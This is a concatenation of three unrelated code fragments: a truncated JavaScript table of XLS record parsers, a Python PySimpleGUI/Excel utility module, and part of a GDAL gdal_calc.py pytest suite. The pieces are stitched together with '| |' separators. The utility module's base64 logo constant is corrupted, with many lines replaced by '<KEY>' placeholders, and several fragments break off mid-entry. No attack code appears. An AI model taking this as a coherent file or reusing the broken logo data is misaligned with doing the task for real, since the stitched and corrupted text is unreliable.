0x0055: { n:"DefColWidth", f:parse_DefColWidth },
0x0059: { n:"XCT", f:parse_XCT },
0x005a: { n:"CRN", f:parse_CRN },
0x005b: { n:"FileSharing", f:parse_FileSharing },
0x005c: { n:'WriteAccess', f:parse_WriteAccess },
0x005d: { n:"Obj", f:parse_Obj },
0x005e: { n:"Uncalced", f:parse_Uncalced },
0x005f: { n:"CalcSaveRecalc", f:parse_CalcSaveRecalc },
0x0060: { n:"Template", f:parse_Template },
0x0061: { n:"Intl", f:parse_Intl },
0x0063: { n:"ObjProtect", f:parse_ObjProtect },
0x007d: { n:"ColInfo", f:parse_ColInfo },
0x0080: { n:"Guts", f:parse_Guts },
0x0081: { n:"WsBool", f:parse_WsBool },
0x0082: { n:"GridSet", f:parse_GridSet },
0x0083: { n:"HCenter", f:parse_HCenter },
0x0084: { n:"VCenter", f:parse_VCenter },
0x0085: { n:'BoundSheet8', f:parse_BoundSheet8 },
0x0086: { n:"WriteProtect", f:parse_WriteProtect },
0x008c: { n:"Country", f:parse_Country },
0x008d: { n:"HideObj", f:parse_HideObj },
0x0090: { n:"Sort", f:parse_Sort },
0x0092: { n:"Palette", f:parse_Palette },
0x0097: { n:"Sync", f:parse_Sync },
0x0098: { n:"LPr", f:parse_LPr },
0x0099: { n:"DxGCol", f:parse_DxGCol },
0x009a: { n:"FnGroupName", f:parse_FnGroupName },
0x009b: { n:"FilterMode", f:parse_FilterMode },
0x009c: { n:"BuiltInFnGroupCount", f:parse_BuiltInFnGroupCount },
0x009d: { n:"AutoFilterInfo", f:parse_AutoFilterInfo },
0x009e: { n:"AutoFilter", f:parse_AutoFilter },
0x00a0: { n:"Scl", f:parse_Scl },
0x00a1: { n:"Setup", f:parse_Setup },
0x00ae: { n:"ScenMan", f:parse_ScenMan },
0x00af: { n:"SCENARIO", f:parse_SCENARIO },
0x00b0: { n:"SxView", f:parse_SxView },
0x00b1: { n:"Sxvd", f:parse_Sxvd },
0x00b2: { n:"SXVI", f:parse_SXVI },
0x00b4: { n:"SxIvd", f:parse_SxIvd },
0x00b5: { n:"SXLI", f:parse_SXLI },
0x00b6: { n:"SXPI", f:parse_SXPI },
0x00b8: { n:"DocRoute", f:parse_DocRoute },
0x00b9: { n:"RecipName", f:parse_RecipName },
0x00bd: { n:"MulRk", f:parse_MulRk },
0x00be: { n:"MulBlank", f:parse_MulBlank },
0x00c1: { n:'Mms', f:parse_Mms },
0x00c5: { n:"SXDI", f:parse_SXDI },
0x00c6: { n:"SXDB", f:parse_SXDB },
0x00c7: { n:"SXFDB", f:parse_SXFDB },
0x00c8: { n:"SXDBB", f:parse_SXDBB },
0x00c9: { n:"SXNum", f:parse_SXNum },
0x00ca: { n:"SxBool", f:parse_SxBool },
0x00cb: { n:"SxErr", f:parse_SxErr },
0x00cc: { n:"SXInt", f:parse_SXInt },
0x00cd: { n:"SXString", f:parse_SXString },
0x00ce: { n:"SXDtr", f:parse_SXDtr },
0x00cf: { n:"SxNil", f:parse_SxNil },
0x00d0: { n:"SXTbl", f:parse_SXTbl },
0x00d1: { n:"SXTBRGIITM", f:parse_SXTBRGIITM },
0x00d2: { n:"SxTbpg", f:parse_SxTbpg },
0x00d3: { n:"ObProj", f:parse_ObProj },
0x00d5: { n:"SXStreamID", f:parse_SXStreamID },
0x00d7: { n:"DBCell", f:parse_DBCell },
0x00d8: { n:"SXRng", f:parse_SXRng },
0x00d9: { n:"SxIsxoper", f:parse_SxIsxoper },
0x00da: { n:"BookBool", f:parse_BookBool },
0x00dc: { n:"DbOrParamQry", f:parse_DbOrParamQry },
0x00dd: { n:"ScenarioProtect", f:parse_ScenarioProtect },
0x00de: { n:"OleObjectSize", f:parse_OleObjectSize },
0x00e0: { n:"XF", f:parse_XF },
0x00e1: { n:'InterfaceHdr', f:parse_InterfaceHdr },
0x00e2: { n:'InterfaceEnd', f:parse_InterfaceEnd },
0x00e3: { n:"SXVS", f:parse_SXVS },
0x00e5: { n:"MergeCells", f:parse_MergeCells },
0x00e9: { n:"BkHim", f:parse_BkHim },
0x00eb: { n:"MsoDrawingGroup", f:parse_MsoDrawingGroup },
0x00ec: { n:"MsoDrawing", f:parse_MsoDrawing },
0x00ed: { n:"MsoDrawingSelection", f:parse_MsoDrawingSelection },
0x00ef: { n:"PhoneticInfo", f:parse_PhoneticInfo },
0x00f0: { n:"SxRule", f:parse_SxRule },
0x00f1: { n:"SXEx", f:parse_SXEx },
0x00f2: { n:"SxFilt", f:parse_SxFilt },
0x00f4: { n:"SxDXF", f:parse_SxDXF },
0x00f5: { n:"SxItm", f:parse_SxItm },
0x00f6: { n:"SxName", f:parse_SxName },
0x00f7: { n:"SxSelect", f:parse_SxSelect },
0x00f8: { n:"SXPair", f:parse_SXPair },
0x00f9: { n:"SxFmla", f:parse_SxFmla },
0x00fb: { n:"SxFormat", f:parse_SxFormat },
0x00fc: { n:"SST", f:parse_SST },
0x00fd: { n:"LabelSst", f:parse_LabelSst },
0x00ff: { n:"ExtSST", f:parse_ExtSST },
0x0100: { n:"SXVDEx", f:parse_SXVDEx },
0x0103: { n:"SXFormula", f:parse_SXFormula },
0x0122: { n:"SXDBEx", f:parse_SXDBEx },
0x0137: { n:"RRDInsDel", f:parse_RRDInsDel },
0x0138: { n:"RRDHead", f:parse_RRDHead },
0x013b: { n:"RRDChgCell", f:parse_RRDChgCell },
0x013d: { n:"RRTabId", f:parse_RRTabId },
0x013e: { n:"RRDRenSheet", f:parse_RRDRenSheet },
0x013f: { n:"RRSort", f:parse_RRSort },
0x0140: { n:"RRDMove", f:parse_RRDMove },
0x014a: { n:"RRFormat", f:parse_RRFormat },
0x014b: { n:"RRAutoFmt", f:parse_RRAutoFmt },
0x014d: { n:"RRInsertSh", f:parse_RRInsertSh },
0x014e: { n:"RRDMoveBegin", f:parse_RRDMoveBegin },
0x014f: { n:"RRDMoveEnd", f:parse_RRDMoveEnd },
0x0150: { n:"RRDInsDelBegin", f:parse_RRDInsDelBegin },
0x0151: { n:"RRDInsDelEnd", f:parse_RRDInsDelEnd },
0x0152: { n:"RRDConflict", f:parse_RRDConflict },
0x0153: { n:"RRDDefName", f:parse_RRDDefName },
0x0154: { n:"RRDRstEtxp", f:parse_RRDRstEtxp },
0x015f: { n:"LRng", f:parse_LRng },
0x0160: { n:"UsesELFs", f:parse_UsesELFs },
0x0161: { n:"DSF", f:parse_DSF },
0x0191: { n:"CUsr", f:parse_CUsr },
0x0192: { n:"CbUsr", f:parse_CbUsr },
0x0193: { n:"UsrInfo", f:parse_UsrInfo },
0x0194: { n:"UsrExcl", f:parse_UsrExcl },
0x0195: { n:"FileLock", f:parse_FileLock },
0x0196: { n:"RRDInfo", f:parse_RRDInfo },
0x0197: { n:"BCUsrs", f:parse_BCUsrs },
0x0198: { n:"UsrChk", f:parse_UsrChk },
0x01a9: { n:"UserBView", f:parse_UserBView },
0x01aa: { n:"UserSViewBegin", f:parse_UserSViewBegin },
0x01ab: { n:"UserSViewEnd", f:parse_UserSViewEnd },
0x01ac: { n:"RRDUserView", f:parse_RRDUserView },
0x01ad: { n:"Qsi", f:parse_Qsi },
0x01ae: { n:"SupBook", f:parse_SupBook },
0x01af: { n:"Prot4Rev", f:parse_Prot4Rev },
0x01b0: { n:"CondFmt", f:parse_CondFmt },
0x01b1: { n:"CF", f:parse_CF },
0x01b2: { n:"DVal", f:parse_DVal },
0x01b5: { n:"DConBin", f:parse_DConBin },
0x01b6: { n:"TxO", | |
# -*- coding: utf-8 -*-
"""Provides utility functions, classes, and constants.
Useful functions are put here in order to prevent circular importing
within the other files.
The functions contained within this module ease the use of user-interfaces,
selecting options for opening files, and working with Excel.
@author: <NAME>
Created on Jul 15, 2020
Attributes
----------
PROCEED_COLOR : tuple(str, str)
The button color for all buttons that proceed to the next window.
The default is ('white', '#00A949'), where '#00A949' is a bright green.
"""
import importlib
import functools
import operator
import os
from pathlib import Path
import textwrap
import numpy as np
import pandas as pd
import PySimpleGUI as sg
try:
import ctypes
except ImportError:
ctypes = None
# (text color, background color) for every button that proceeds to the next window
PROCEED_COLOR = ('white', '#00A949')
# the bytes representation of a png file used for the logo
# NOTE(review): several payload lines below read '<KEY>' -- the base64 data
# looks redacted/corrupted in this copy; restore from the original asset
# before decoding this constant.
_LOGO = (
b'iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAABHNCSVQICAgIfAhkiAAAAAlwSFlz'
b'AA<KEY>'
b'<KEY>'
b'phOnTTLNaJva0am1nTqTTHR8xFSNhuADlcSJFXFRNCby2mWXx77u6/QPYAOLxDAhfH/d/X2/x/c7'
b'<KEY>/O1VrLHApWnhEAlebojd2tWKOHJ5feGvVjNJuWma3N0rB498'
b'hLbDnfgW6DKeLmEdC4soaxJpuL1L6jvyKe6eaAcAhnVtWaOf8+YRrfezm1rHsZ+RlKo/Equ7AgwL'
b'AKAxf1jrOvFn6dLGbfriXbWMvfJ3xFwwczg5jXzdpXYe3yY3PbN3TOHZO0qJo+YNYimuBOGZYbsW'
b'6+rTes7vl8//eAtLbPNnss6VG6BGGJJcWsfwVrvmv7AboeYPqNynI8ZcFzHNWkiMeYVs+k9eplok'
b'<KEY>'
b'<KEY>'
b'<KEY>
b'<KEY>'
b'<KEY>'
b'<KEY>'
b'<KEY>'
b'<KEY>'
b'<KEY>'
b'<KEY>'
b'<KEY>'
b'<KEY>'
b'+<KEY>'
b'<KEY>'
b'<KEY>'
b'PqHuvgXxvyCFFx4DAJHVkXNLlu5KdJSpxkQ1TTIAfI5BTJ10AXqWWADArOMye1WyPtGRBcGt8EDs'
b'Xpjt9sUibZMuQFW1EAB8GQqdmX/29IrJKvAwxPdAQJW8ACByXA4mdklplA7OBz3DTXiwxQU0+P0f'
b'hFRFKTSbc3YXz9s2XsCPnE5Hginok2J+AEg3JGVMVEBc8es3bpwtMifvrk1L//WmzKwdRcnJ87ul'
b'aH0wKvWaBcFoYdkcm45f1Kco0qLOzpIROWifojQDcCy3pTx/cvFiK1XB+mWJ1DVeeOE7CwCAusYL'
b'<KEY>2+<KEY>'
b'AKANvrpGYcz1OASyOSu3rNBizhR0hO+OSIFzAd/Nw/fvt4zXyYL0dNEtCGWzTKbUuwNR3/ve5k9a'
b'h55wNU6nId9sLgmoasc/bt++OTLu/zboYU40Aq2CAAAAAElFTkSuQmCC'
)
class WindowCloseError(Exception):
    """Raised when a GUI window is closed earlier than the program expects."""
def safely_close_window(window):
    """
    Closes a PySimpleGUI window and then raises WindowCloseError.

    Intended for the case where the user manually closes a window early:
    the window is torn down first, and the exception that follows lets
    callers distinguish a manual close from a normal exit.

    Parameters
    ----------
    window : sg.Window
        The window that will be closed.

    Raises
    ------
    WindowCloseError
        Always raised after the window has been closed.
    """
    window.close()
    raise WindowCloseError('Window was closed earlier than expected.')
def doc_lru_cache(function=None, **lru_cache_kwargs):
    """
    Decorator that keeps a function's docstring when using functools.lru_cache.

    Parameters
    ----------
    function : Callable, optional
        The function to wrap. When the decorator is applied with keyword
        arguments (e.g. ``@doc_lru_cache(maxsize=200)``), this is None and a
        partially-applied decorator is returned instead.
    **lru_cache_kwargs
        Any keyword arguments to pass to functools.lru_cache (maxsize and/or
        typed, as of Python 3.9).

    Returns
    -------
    Callable
        The cached function, or a decorator awaiting the function when
        called with only keyword arguments.

    Examples
    --------
    A basic usage of this decorator would look like:

    >>> @doc_lru_cache(maxsize=200)
    ... def function(arg, kwarg=1):
    ...     '''Docstring.'''
    ...     return arg + kwarg
    >>> function.__doc__
    'Docstring.'
    """
    if function is None:
        # Called as ``@doc_lru_cache(maxsize=...)``: return a decorator that
        # will receive the function on the next call. (Previously this path
        # wrapped a partial in the cache and re-entered doc_lru_cache through
        # it, and update_wrapper targeted a partial lacking __name__.)
        return functools.partial(doc_lru_cache, **lru_cache_kwargs)

    @functools.lru_cache(**lru_cache_kwargs)
    def wrapper(*args, **kwargs):
        return function(*args, **kwargs)

    # Copy __doc__, __name__, etc. onto the cached wrapper so help() and
    # introspection keep working.
    return functools.update_wrapper(wrapper, function)
def set_dpi_awareness(awareness_level=1):
    """
    Sets DPI awareness for the Windows operating system so that GUIs are not blurry.

    Fixes blurry tkinter GUIs due to weird dpi scaling in Windows os. Other
    operating systems are ignored.

    Parameters
    ----------
    awareness_level : {1, 0, 2}
        The dpi awareness level to set. 0 turns off dpi awareness, 1 sets dpi
        awareness to scale with the system dpi and automatically changes when
        the system dpi changes, and 2 sets dpi awareness per monitor and does
        not change when system dpi changes. Default is 1.

    Raises
    ------
    ValueError
        Raised if awareness_level is not 0, 1, or 2. Raised on every
        operating system so that misuse is caught even off Windows.

    Notes
    -----
    Will only work on Windows 8.1 or Windows 10. Not sure if earlier versions
    of Windows have this issue anyway.
    """
    # Validate unconditionally so the documented ValueError is raised on all
    # platforms; previously invalid levels were silently ignored off Windows.
    if awareness_level not in (0, 1, 2):
        raise ValueError('Awareness level must be either 0, 1, or 2.')
    # 'nt' designates Windows operating system
    if os.name == 'nt' and ctypes is not None:
        try:
            ctypes.oledll.shcore.SetProcessDpiAwareness(awareness_level)
        except (AttributeError, OSError, PermissionError):
            # AttributeError is raised if the dll loader was not created, OSError
            # is raised if setting the dpi awareness errors, and PermissionError is
            # raised if the dpi awareness was already set, since it can only be set
            # once per thread. All are ignored; this is best-effort.
            pass
@doc_lru_cache()
def check_availability(module):
    """
    Determines whether an optional dependency can be imported.

    No version check is performed; the caller is expected to verify
    that the module is actually usable.

    Parameters
    ----------
    module : str
        The name of the module to look up.

    Returns
    -------
    bool
        True if the module can be imported, False if it cannot.

    Notes
    -----
    importlib.util.find_spec locates the module without importing it,
    which is faster than a try/except around an actual import.
    """
    spec = importlib.util.find_spec(module)
    return spec is not None
@doc_lru_cache(maxsize=None)
def excel_column_name(index):
    """
    Converts a 1-based column index to its Excel column name.

    Parameters
    ----------
    index : int
        The column number. Must be 1-based, ie. the first column
        number is 1 rather than 0.

    Returns
    -------
    col_name : str
        The Excel name for the input index, eg. an index of 1 returns 'A'.

    Raises
    ------
    ValueError
        Raised if the input index is not in the range 1 <= index <= 18278,
        meaning the column name is not within 'A'...'ZZZ'.

    Notes
    -----
    Builds the name iteratively in bijective base 26 (no zero digit):
    each pass peels off the least-significant letter, and chr(64 + digit)
    maps digit 1..26 onto 'A'..'Z'. Results are cached by the decorator
    so repeated lookups are fast.
    """
    if not 1 <= index <= 18278:  # ensures column is between 'A' and 'ZZZ'.
        raise ValueError(f'Column index {index} must be between 1 and 18278.')
    letters = []
    remaining = index
    while remaining > 0:
        remaining, digit = divmod(remaining, 26)
        if digit == 0:
            # a zero digit stands for 'Z' with a borrow from the next place
            digit = 26
            remaining -= 1
        letters.append(chr(64 + digit))
    return ''.join(reversed(letters))
def get_min_size(default_size, scale, dimension='both'):
    """
    Returns the minimum size for a GUI element to match the screen size.

    Parameters
    ----------
    default_size : int
        The default number of pixels to use. Needed because
        sg.Window.get_screen_size() can return the total size of multiple
        screens on some linux systems.
    scale : float
        The scale factor applied to the reported screen size, e.g. 0.5 to
        cap the element at half the smallest screen dimension.
    dimension : str
        Which screen dimension to compare: 'width', 'height', or 'both'.

    Returns
    -------
    int
        The smallest of scale * screen width, scale * screen height (per
        `dimension`), and default_size.
    """
    axis_lookup = {'width': (0,), 'height': (1,), 'both': (0, 1)}
    screen_size = sg.Window.get_screen_size()
    candidates = [scale * screen_size[axis] for axis in axis_lookup[dimension]]
    candidates.append(default_size)
    return int(min(candidates))
def string_to_unicode(input_list):
    r"""
    Converts strings to unicode by replacing ``'\\'`` with ``'\'``.

    User input from GUI text elements arrives as raw strings, so any ``'\'``
    typed by the user becomes ``'\\'`` and would not be interpreted as the
    intended escape. Entries containing a backslash are re-decoded so that
    sequences like ``'\\n'`` and ``'\\t'`` become ``'\n'`` and ``'\t'``;
    entries without a backslash are passed through untouched.

    Parameters
    ----------
    input_list : (list, tuple) or str
        A container of strings or a single string.

    Returns
    -------
    output : (list, tuple) or str
        A single string when a string was given, otherwise a list of the
        converted strings.

    Notes
    -----
    raw_unicode_escape encoding ensures existing unicode characters survive
    the round trip. For matplotlib mathtext such as ``$\nu$``, type
    ``$\\nu$`` in the GUI: the GUI stores ``$\\\\nu$`` and this function
    restores ``$\\nu$``, which matplotlib treats the same as ``$\nu$``.
    """
    single_input = isinstance(input_list, str)
    entries = [input_list] if single_input else input_list
    converted = [
        entry.encode('raw_unicode_escape').decode('unicode_escape')
        if '\\' in entry else entry
        for entry in entries
    ]
    return converted[0] if single_input else converted
def stringify_backslash(input_string):
    r"""
    Fixes strings containing backslash, such as ``'\n'``, so that they display properly in GUIs.

    Parameters
    ----------
    input_string : str
        The string that potentially contains a backslash character.

    Returns
    -------
    str
        The string with backslash-type characters replaced by their
        double-backslash, displayable forms.

    Notes
    -----
    ``'\n'``, ``'\t'``, and ``'\r'`` are single characters, not a backslash
    followed by a letter, so each must be replaced individually. The literal
    backslash is handled first so the escapes added afterwards are not
    doubled again.
    """
    result = input_string.replace('\\', '\\\\')
    result = result.replace('\n', '\\n')
    result = result.replace('\t', '\\t')
    return result.replace('\r', '\\r')
def validate_inputs(window_values, integers=None, floats=None,
strings=None, user_inputs=None, constraints=None):
"""
Validates entries from a PySimpleGUI | |
<reponame>nicoguillier/gdal<filename>autotest/pyscripts/test_gdal_calc.py
#!/usr/bin/env pytest
# -*- coding: utf-8 -*-
###############################################################################
# $Id: test_gdal_calc.py 25549 2013-01-26 11:17:10Z rouault $
#
# Project: GDAL/OGR Test Suite
# Purpose: gdal_calc.py testing
# Author: <NAME> <etourigny dot dev @ gmail dot com>
#
###############################################################################
# Copyright (c) 2013, <NAME> <<EMAIL>>
# Copyright (c) 2014, <NAME> <etourigny dot dev @ <EMAIL> dot <EMAIL>>
# Copyright (c) 2020, <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
###############################################################################
import os
import shutil
from copy import copy
from osgeo import gdal
import test_py_scripts
import pytest
from collections import defaultdict
# test that numpy is available, if not skip all tests
try:
import numpy as np
from osgeo.utils import gdal_calc
from osgeo.gdal_array import GDALTypeCodeToNumericTypeCode
numpy_available = True
except (ImportError, AttributeError):
numpy_available = False
# Usage: gdal_calc.py [-A <filename>] [--A_band] [-B...-Z filename] [other_options]
def check_file(filename_or_ds, checksum, i=None, bnd_idx=1):
    """Open a dataset (when given a path) and verify the checksum of one band.

    When ``checksum`` is None the actual checksum is printed instead of
    asserted, which is handy for generating expected values. Returns the
    opened dataset so callers can inspect it further.
    """
    if gdal_calc.is_path_like(filename_or_ds):
        dataset = gdal.Open(filename_or_ds)
    else:
        dataset = filename_or_ds
    assert dataset is not None, 'ds{} not found'.format(i if i is not None else '')
    actual_checksum = dataset.GetRasterBand(bnd_idx).Checksum()
    if checksum is None:
        print('ds{} bnd{} checksum is {}'.format(i, bnd_idx, actual_checksum))
    else:
        assert actual_checksum == checksum, 'ds{} bnd{} wrong checksum, expected {}, got {}'.format(i, bnd_idx, checksum, actual_checksum)
    return dataset
# per-test-id counters used by make_temp_filename to produce unique names
temp_counter_dict = defaultdict(int)
# running counter for --optfile temporary files
opts_counter_counter = 0
# expected per-band checksums of the shared input ../gcore/data/stefan_full_rgba.tif
input_checksum = (12603, 58561, 36064, 10807)
def get_input_file():
    """Return the path of the shared RGBA test input, copying it into tmp/ on first use."""
    path = make_temp_filename(0)
    if not os.path.isfile(path):
        shutil.copy('../gcore/data/stefan_full_rgba.tif', path)
    return path
def format_temp_filename(test_id, idx, is_opt=False):
    """Build the temporary file name for a test id and counter value.

    Option files get their own ``tmp/opt<idx>`` namespace; test id 0 maps to
    the bare ``tmp/test_gdal_calc_py.tif`` shared input name.
    """
    if is_opt:
        return 'tmp/opt{}'.format(idx)
    suffix = '' if test_id == 0 else '_{}_{}'.format(test_id, idx)
    return 'tmp/test_gdal_calc_py{}.tif'.format(suffix)
def make_temp_filename(test_id, is_opt=False):
    """Advance the appropriate counter and return a fresh temporary file name."""
    if is_opt:
        global opts_counter_counter
        opts_counter_counter += 1
        counter = opts_counter_counter
    else:
        global temp_counter_dict
        # test id 0 is the shared input file and always maps to index 1
        temp_counter_dict[test_id] = (temp_counter_dict[test_id] + 1) if test_id else 1
        counter = temp_counter_dict[test_id]
    return format_temp_filename(test_id, counter, is_opt)
def make_temp_filename_list(test_id, test_count, is_opt=False):
    """Return ``test_count`` freshly generated temporary file names."""
    return [make_temp_filename(test_id, is_opt) for _ in range(test_count)]
def test_gdal_calc_py_1():
    """Basic copy: single-band passthrough via -A and -Z inputs."""
    if not numpy_available:
        pytest.skip("numpy is not available, skipping all tests", allow_module_level=True)
    script_path = test_py_scripts.get_py_script('gdal_calc')
    if script_path is None:
        pytest.skip("gdal_calc script not found, skipping all tests", allow_module_level=True)
    infile = get_input_file()
    test_id, test_count = 1, 3
    out = make_temp_filename_list(test_id, test_count)
    # copy band 1 via -A, band 2 via -A, and band 2 via -Z
    commands = (
        '-A {} --calc=A --overwrite --outfile {}'.format(infile, out[0]),
        '-A {} --A_band=2 --calc=A --overwrite --outfile {}'.format(infile, out[1]),
        '-Z {} --Z_band=2 --calc=Z --overwrite --outfile {}'.format(infile, out[2]),
    )
    for command in commands:
        test_py_scripts.run_py_script(script_path, 'gdal_calc', command)
    for idx, checksum in enumerate((input_checksum[0], input_checksum[1], input_checksum[1])):
        check_file(out[idx], checksum, idx + 1)
def test_gdal_calc_py_2():
    """Simple formulas: band addition, multiplication, and sqrt with a Float32 output."""
    if not numpy_available:
        pytest.skip("numpy is not available, skipping all tests", allow_module_level=True)
    script_path = test_py_scripts.get_py_script('gdal_calc')
    if script_path is None:
        pytest.skip("gdal_calc script not found, skipping all tests", allow_module_level=True)
    infile = get_input_file()
    test_id, test_count = 2, 3
    out = make_temp_filename_list(test_id, test_count)
    commands = (
        '-A {} --A_band 1 -B {} --B_band 2 --calc=A+B --overwrite --outfile {}'.format(infile, infile, out[0]),
        '-A {} --A_band 1 -B {} --B_band 2 --calc=A*B --overwrite --outfile {}'.format(infile, infile, out[1]),
        '-A {} --A_band 1 --calc="sqrt(A)" --type=Float32 --overwrite --outfile {}'.format(infile, out[2]),
    )
    for command in commands:
        test_py_scripts.run_py_script(script_path, 'gdal_calc', command)
    for idx, checksum in enumerate((12368, 62785, 47132)):
        check_file(out[idx], checksum, idx + 1)
#
def test_gdal_calc_py_3():
    """--allBands option: a plain copy must reproduce all four input bands."""
    if not numpy_available:
        pytest.skip("numpy is not available, skipping all tests", allow_module_level=True)
    script_path = test_py_scripts.get_py_script('gdal_calc')
    if script_path is None:
        pytest.skip("gdal_calc script not found, skipping all tests", allow_module_level=True)
    infile = get_input_file()
    test_id, test_count = 3, 1
    out = make_temp_filename_list(test_id, test_count)
    test_py_scripts.run_py_script(script_path, 'gdal_calc', '-A {} --allBands A --calc=A --overwrite --outfile {}'.format(infile, out[0]))
    for band, checksum in enumerate(input_checksum[0:4], start=1):
        check_file(out[0], checksum, 1, bnd_idx=band)
def test_gdal_calc_py_4():
    """--allBands option combined with a single-band B input and NoDataValue."""
    if not numpy_available:
        pytest.skip("numpy is not available, skipping all tests", allow_module_level=True)
    script_path = test_py_scripts.get_py_script('gdal_calc')
    if script_path is None:
        pytest.skip("gdal_calc script not found, skipping all tests", allow_module_level=True)
    infile = get_input_file()
    test_id, test_count = 4, 3
    out = make_temp_filename_list(test_id, test_count)
    # some values are clipped to 255, but this doesn't matter... small values were visually checked
    test_py_scripts.run_py_script(script_path, 'gdal_calc', '-A {} --calc=1 --overwrite --outfile {}'.format(infile, out[0]))
    test_py_scripts.run_py_script(script_path, 'gdal_calc', '-A {} -B {} --B_band 1 --allBands A --calc=A+B --NoDataValue=999 --overwrite --outfile {}'.format(infile, out[0], out[1]))
    for band, checksum in enumerate((29935, 13128, 59092), start=1):
        check_file(out[1], checksum, 2, bnd_idx=band)
    # these values were not tested
    test_py_scripts.run_py_script(script_path, 'gdal_calc', '-A {} -B {} --B_band 1 --allBands A --calc=A*B --NoDataValue=999 --overwrite --outfile {}'.format(infile, infile, out[2]))
    for band, checksum in enumerate((10025, 62785, 10621), start=1):
        check_file(out[2], checksum, 3, bnd_idx=band)
def test_gdal_calc_py_5():
    """ test python interface, basic copy """
    if not numpy_available:
        pytest.skip("numpy is not available, skipping all tests", allow_module_level=True)
    script_path = test_py_scripts.get_py_script('gdal_calc')
    if script_path is None:
        pytest.skip("gdal_calc script not found, skipping all tests", allow_module_level=True)
    infile = get_input_file()
    test_id, test_count = 5, 4
    out = make_temp_filename_list(test_id, test_count)
    gdal_calc.Calc('A', A=infile, overwrite=True, quiet=True, outfile=out[0])
    gdal_calc.Calc('A', A=infile, A_band=2, overwrite=True, quiet=True, outfile=out[1])
    gdal_calc.Calc('Z', Z=infile, Z_band=2, overwrite=True, quiet=True, outfile=out[2])
    gdal_calc.Calc(['A', 'Z'], A=infile, Z=infile, Z_band=2, overwrite=True, quiet=True, outfile=out[3])
    # the three single-band outputs are verified here; the two-band out[3] is
    # verified band-by-band below
    for idx, expected in enumerate((input_checksum[0], input_checksum[1], input_checksum[1])):
        check_file(out[idx], expected, idx + 1)
    for band, expected in enumerate((input_checksum[0], input_checksum[1]), start=1):
        check_file(out[3], expected, 4, bnd_idx=band)
def test_gdal_calc_py_6():
    """ test nodata """
    if not numpy_available:
        pytest.skip("numpy is not available, skipping all tests", allow_module_level=True)
    script_path = test_py_scripts.get_py_script('gdal_calc')
    if script_path is None:
        pytest.skip("gdal_calc script not found, skipping all tests", allow_module_level=True)
    test_id, test_count = 6, 2
    out = make_temp_filename_list(test_id, test_count)
    # tag pixel value 74 as nodata in the source, then run a copy with NoDataValue=1
    gdal.Translate(out[0], '../gcore/data/byte.tif', options='-a_nodata 74')
    gdal_calc.Calc('A', A=out[0], overwrite=True, quiet=True, outfile=out[1], NoDataValue=1)
    for idx, expected in enumerate((4672, 4673)):
        ds = check_file(out[idx], expected, idx + 1)
        if idx == 1:
            # with 74 treated as nodata the computed minimum rises to 90
            result = ds.GetRasterBand(1).ComputeRasterMinMax()
            assert result == (90, 255), 'Error! min/max not correct!'
        ds = None
def test_gdal_calc_py_7():
    """ test --optfile """
    if not numpy_available:
        pytest.skip("numpy is not available, skipping all tests", allow_module_level=True)
    script_path = test_py_scripts.get_py_script('gdal_calc')
    if script_path is None:
        pytest.skip("gdal_calc script not found, skipping all tests", allow_module_level=True)
    infile = get_input_file()
    test_id, test_count = 7, 4
    out = make_temp_filename_list(test_id, test_count)
    opt_files = make_temp_filename_list(test_id, test_count, is_opt=True)
    # single-line optfile
    with open(opt_files[0], 'w') as f:
        f.write('-A {} --calc=A --overwrite --outfile {}'.format(infile, out[0]))
    # Lines in optfiles beginning with '#' should be ignored
    with open(opt_files[1], 'w') as f:
        f.write('-A {} --A_band=2 --calc=A --overwrite --outfile {}'.format(infile, out[1]))
        f.write('\n# -A_band=1')
    # options on separate lines should work, too
    per_line = ('-Z {}'.format(infile), '--Z_band=2', '--calc=Z', '--overwrite', '--outfile {}'.format(out[2]))
    with open(opt_files[2], 'w') as f:
        f.write('\n'.join(per_line) + '\n')
    # double-quoted options should be read as single arguments. Mixed numbers of arguments per line should work.
    mixed = ('-Z {} --Z_band=2'.format(infile), '--calc "Z + 0"', '--overwrite --outfile {}'.format(out[3]))
    with open(opt_files[3], 'w') as f:
        f.write('\n'.join(mixed) + '\n')
    expected_checksums = (input_checksum[0], input_checksum[1], input_checksum[1], input_checksum[1])
    for idx, expected in enumerate(expected_checksums):
        test_py_scripts.run_py_script(script_path, 'gdal_calc', '--optfile {}'.format(opt_files[idx]))
        check_file(out[idx], expected, idx + 1)
def test_gdal_calc_py_8():
    """ test multiple calcs """
    if not numpy_available:
        pytest.skip("numpy is not available, skipping all tests", allow_module_level=True)
    script_path = test_py_scripts.get_py_script('gdal_calc')
    if script_path is None:
        pytest.skip("gdal_calc script not found, skipping all tests", allow_module_level=True)
    infile = get_input_file()
    test_id, test_count = 8, 1
    out = make_temp_filename_list(test_id, test_count)
    # each --calc expression becomes one band of the single output file
    args = ('-A {} --A_band=1 -B {} --B_band=2 -Z {} --Z_band=2 '
            '--calc=A --calc=B --calc=Z --overwrite --outfile {}').format(infile, infile, infile, out[0])
    test_py_scripts.run_py_script(script_path, 'gdal_calc', args)
    for band, expected in enumerate((input_checksum[0], input_checksum[1], input_checksum[1]), start=1):
        check_file(out[0], expected, 1, bnd_idx=band)
def my_sum(a, gdal_dt=None):
    """ Sum a sequence of equal-shaped arrays element-wise using numpy.

    gdal_dt, when given, is a GDAL type code mapped to the numpy dtype used
    for the accumulation (None lets numpy pick).
    """
    np_dt = GDALTypeCodeToNumericTypeCode(gdal_dt)
    stacked = np.stack(a)
    return stacked.sum(axis=0, dtype=np_dt)
def my_max(a):
    """ Element-wise maximum over a sequence of equal-shaped arrays using numpy. """
